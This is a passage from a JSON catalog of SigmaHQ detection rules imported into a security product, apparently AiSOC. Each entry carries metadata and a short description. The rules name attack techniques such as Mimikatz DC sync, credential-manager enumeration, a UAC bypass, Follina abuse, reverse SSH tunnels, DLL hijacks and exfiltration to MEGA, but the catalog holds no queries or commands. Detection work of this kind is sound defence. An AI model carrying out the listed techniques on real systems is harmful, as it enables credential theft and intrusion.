"sigmahq-sigma-5f1573a7-363b-4114-9208-ad7a61de46eb", "type": "detection", "name": "ESXi VM List Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"vm\" flag in order to retrieve information about the installed VMs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-vm-list-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"5f1573a7-363b-4114-9208-ad7a61de46eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml" } }, { "id": "sigmahq-sigma-5f521e4b-0105-4b72-845b-2198a54487b9", "type": "detection", "name": "Users Authenticating To Other Azure AD Tenants", "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/users-authenticating-to-other-azure-ad-tenants.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f521e4b-0105-4b72-845b-2198a54487b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml" } }, { "id": "sigmahq-sigma-5f60740a-f57b-4e76-82a1-15b6ff2cb134", "type": "detection", "name": "Registry Modification Via Regini.EXE", "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/registry-modification-via-regini-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regini_execution.yml" } }, { "id": "sigmahq-sigma-5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "type": "detection", "name": "RDP Over Reverse SSH Tunnel", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-over-reverse-ssh-tunnel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" } }, { "id": "sigmahq-sigma-5f6a601c-2ecb-498b-9c33-660362323afa", "type": "detection", "name": "Root Certificate Installed From Susp Locations", "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/root-certificate-installed-from-susp-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f6a601c-2ecb-498b-9c33-660362323afa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml" } }, { "id": "sigmahq-sigma-5f87308a-0a5b-4623-ae15-d8fa1809bc60", "type": "detection", "name": "Suspicious Files in Default GPO Folder", "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-files-in-default-gpo-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml" } }, { "id": "sigmahq-sigma-5f92fff9-82e2-48eb-8fc1-8b133556a551", "type": "detection", "name": "Remote Encrypting File System Abuse", "description": "Detects remote RPC calls to possibly abuse remote 
encryption service via MS-EFSR", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-encrypting-file-system-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f92fff9-82e2-48eb-8fc1-8b133556a551", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" } }, { "id": "sigmahq-sigma-5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f", "type": "detection", "name": "PowerShell Web Access Installation - PsScript", "description": "Detects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-web-access-installation-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f9c7f1a-7c21-4c39-b2f3-8d8006e0e51f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_powershell_web_access_installation.yml" } }, { "id": 
"sigmahq-sigma-5f9db380-ea57-4d1e-beab-8a2d33397e93", "type": "detection", "name": "UAC Bypass Using Windows Media Player - Registry", "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-windows-media-player-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" } }, { "id": "sigmahq-sigma-5fc297ae-25b6-488a-8f25-cc12ac29b744", "type": "detection", "name": "Potentially Suspicious Usage Of Qemu", "description": "Detects potentially suspicious execution of the Qemu utility in a Windows environment.\nThreat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-usage-of-qemu.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5fc297ae-25b6-488a-8f25-cc12ac29b744", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_qemu_suspicious_execution.yml" } }, { "id": "sigmahq-sigma-5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", "type": "detection", "name": "Mstsc.EXE Execution With Local RDP File", "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mstsc-exe-execution-with-local-rdp-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml" } }, { "id": "sigmahq-sigma-6004abd0-afa4-4557-ba90-49d172e0a299", "type": "detection", "name": "Execute Pcwrun.EXE To Leverage Follina", "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-pcwrun-exe-to-leverage-follina.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6004abd0-afa4-4557-ba90-49d172e0a299", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" } }, { "id": "sigmahq-sigma-60167e5c-84b2-4c95-a7ac-86281f27c445", "type": "detection", "name": "Remote PowerShell Session (PS Classic)", "description": "Detects remote PowerShell sessions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-powershell-session-ps-classic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" } }, { "id": "sigmahq-sigma-602a1f13-c640-4d73-b053-be9a2fa58b96", "type": "detection", "name": "HackTool - Powerup Write Hijack DLL", "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-powerup-write-hijack-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml" } }, { "id": "sigmahq-sigma-602f5669-6927-4688-84db-0d4b7afb2150", "type": "detection", "name": "Disable Powershell Command History", "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-powershell-command-history.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "602f5669-6927-4688-84db-0d4b7afb2150", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" } }, { "id": "sigmahq-sigma-603c6630-5225-49c1-8047-26c964553e0e", "type": "detection", "name": "Enumerate Credentials from Windows Credential Manager With PowerShell", "description": "Adversaries may search for common password storage locations to obtain user 
credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enumerate-credentials-from-windows-credential-manager-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "603c6630-5225-49c1-8047-26c964553e0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" } }, { "id": "sigmahq-sigma-60936b49-fca0-4f32-993d-7415edcf9a5d", "type": "detection", "name": "New Application in AppCompat", "description": "A General detection for a new application in AppCompat. 
This indicates an application executing for the first time on an endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-application-in-appcompat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60936b49-fca0-4f32-993d-7415edcf9a5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" } }, { "id": "sigmahq-sigma-60bfeac3-0d35-4302-8efb-1dd16f715bc6", "type": "detection", "name": "Suspicious SysAidServer Child", "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-sysaidserver-child.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml" } }, { "id": 
"sigmahq-sigma-60de9b57-dc4d-48b9-a6a0-b39e0469f876", "type": "detection", "name": "Disabling Multi Factor Authentication", "description": "Detects disabling of Multi Factor Authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabling-multi-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60de9b57-dc4d-48b9-a6a0-b39e0469f876", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/audit/microsoft365_disabling_mfa.yml" } }, { "id": "sigmahq-sigma-60f16a96-db70-42eb-8f76-16763e333590", "type": "detection", "name": "New Capture Session Launched Via DXCap.EXE", "description": "Detects the execution of \"DXCap.EXE\" with the \"-c\" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. 
This can be abused to potentially bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-capture-session-launched-via-dxcap-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60f16a96-db70-42eb-8f76-16763e333590", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dxcap_arbitrary_binary_execution.yml" } }, { "id": "sigmahq-sigma-60f1ce20-484e-41bd-85f4-ac4afec2c541", "type": "detection", "name": "GUI Input Capture - macOS", "description": "Detects attempts to use system dialog prompts to capture user credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1056.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gui-input-capture-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60f1ce20-484e-41bd-85f4-ac4afec2c541", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" } }, { "id": "sigmahq-sigma-60f6535a-760f-42a9-be3f-c9a0a025906e", "type": "detection", 
"name": "Use of Legacy Authentication Protocols", "description": "Alert on when legacy authentication has been used on an account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-legacy-authentication-protocols.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60f6535a-760f-42a9-be3f-c9a0a025906e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml" } }, { "id": "sigmahq-sigma-60fc936d-2eb0-4543-8a13-911c750a1dfc", "type": "detection", "name": "Interactive AT Job", "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/interactive-at-job.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml" } }, { "id": 
"sigmahq-sigma-6104e693-a7d6-4891-86cb-49a258523559", "type": "detection", "name": "Bash Interactive Shell", "description": "Detects execution of the bash shell with the interactive flag \"-i\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bash-interactive-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6104e693-a7d6-4891-86cb-49a258523559", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml" } }, { "id": "sigmahq-sigma-61171ffc-d79c-4ae5-8e10-9323dba19cd3", "type": "detection", "name": "Azure VPN Connection Modified or Deleted", "description": "Identifies when a VPN connection is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-vpn-connection-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml" 
} }, { "id": "sigmahq-sigma-611eab06-a145-4dfa-a295-3ccc5c20f59a", "type": "detection", "name": "Mimikatz DC Sync", "description": "Detects Mimikatz DC sync security events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mimikatz-dc-sync.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dcsync.yml" } }, { "id": "sigmahq-sigma-6120ac2a-a34b-42c0-a9bd-1fb9f459f348", "type": "detection", "name": "AddinUtil.EXE Execution From Uncommon Directory", "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/addinutil-exe-execution-from-uncommon-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "6120ac2a-a34b-42c0-a9bd-1fb9f459f348", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml" } }, { "id": "sigmahq-sigma-612e47e9-8a59-43a6-b404-f48683f45bd6", "type": "detection", "name": "ServiceDll Hijack", "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry.\nThis is often used as a method of persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/servicedll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" } }, { "id": "sigmahq-sigma-613c03ba-0779-4a53-8a1f-47f914a4ded3", "type": "detection", "name": "DNS Query To MEGA Hosting Website", "description": "Detects DNS queries for subdomains related to MEGA sharing website", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-mega-hosting-website.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_mega_nz.yml" } }, { "id": "sigmahq-sigma-614a7e17-5643-4d89-b6fe-f9df1a79641c", "type": "detection", "name": "Wmiprvse Wbemcomn DLL Hijack - File", "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmiprvse-wbemcomn-dll-hijack-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" } }, { "id": "sigmahq-sigma-614cf376-6651-47c4-9dcc-6b9527f749f4", "type": "detection", "name": "Suspicious Scheduled Task Update", "description": "Detects update to a scheduled task event that contain suspicious keywords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
